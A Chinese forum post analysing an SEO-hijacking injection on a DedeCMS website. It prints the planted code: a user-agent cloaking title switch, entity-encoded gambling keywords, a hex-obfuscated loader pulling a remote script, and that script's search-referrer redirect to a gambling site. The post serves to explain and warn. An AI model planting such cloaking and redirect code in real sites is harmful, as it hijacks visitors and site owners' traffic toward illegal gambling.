|
本帖最后由 Jimoy 于 2020-8-2 23:51 编辑
百度快照劫持大家应该都听过,但具体是怎么回事呢?今天给大家讲一下。
有个朋友的站,是用dedecms做的,不得不吐槽一下,DEDECMS果然是漏洞百出,然后被HACK插入了代码。今天我们来分析这几行代码,比较简单,也很容易学会。
【1】<script>if(navigator.userAgent.toLocaleLowerCase().indexOf("baidu") == -1){document.title = "{dede:global.cfg_webname/}"}</script>
大家来看这段JS,JS里面包含一个判断,是根据什么判断呢,这是是根据userAgent来判断,如果不是百度来的,那就显示dedecms本身的标题,所以这也就是为什么我们直接打开网页,(输入网址的方式打开)而显示正常标题的原因。
【2】<title>天津时时彩,天
津时时彩规则,天
津时时彩玩法,天
津时时彩稳赢方案
-彩乐园</title>
再来看这三行代码,这三行代码好像看不懂,他采用的是Unicode编码,解码以后,是“天津时时彩,天津时时彩规则,天津时时彩玩法,天津时时彩稳赢方案-彩乐园”这一行代码,搞懂了。
【3】- <script type="text/javascript">
- window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65"] ('
- \x3c\x73\x63\x72\x69\x70\x74 \x74\x79\x70\x65\x3d\x22\x74\x65\x78\x74\x2f\x6a
- \x61\x76\x61\x73\x63\x72\x69\x70\x74\x22 \x73\x
- 72\x63\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x74\x2e\x63\x6e\x2f\x52\x6e\x
- 59\x30\x68\x4c\x6c\x22\x3e\x3c\x2
- f\x73\x63\x72\x69\x70\x74\x3e');
- </script>
复制代码 解密出来就是这段话:
- < script type = "text/javascript" > window["document"]["write"]('<script type="text/javascript" src="http://t.cn/RnY0hLl"></script>'); < /script>
复制代码 意思是向首页中插入这行代码
那为什么还是会跳转呢?就是这行代码的事,这个转代码其实是向原网页插入一JS JS原地址 :
http://SEO268.su.bcebos.com/cly.js
而JS的内容是如下内容:
- document.writeln("<script LANGUAGE=\'Javascript\'>");
- document.writeln("var s=document.referrer");
- document.writeln("if(s.indexOf(\'baidu\')>0 || s.indexOf(\'sogou\')>0 || s.indexOf(\'soso\')>0 ||s.indexOf(\'
- sm\')>0 ||s.indexOf(\'uc\')>0 ||s.indexOf(\'bing\')>0 ||s.indexOf(\'yahoo\')>0 ||s.indexOf(\'so\')>0 ||s.indexOf(\'google\')>0)");
- document.writeln("location.href=\'http://t.cn/RnYpcMt\';");
- document.writeln("</script>");
- document.writeln("");
- document.writeln("");
复制代码
说是百度快照 劫持,其实只要是搜索引擎来的都会劫持。跳转到另一个短网址,而短网址解密出来:http://www.caileyuan.cc
就是这个BC网站,这些黑客真是煞费苦心。
|
上一篇: 揭秘刷百度权重那些不为人知的事情下一篇: 正是这一套机制使得欧陆列强的士兵在某些时刻战斗欲望非常强
|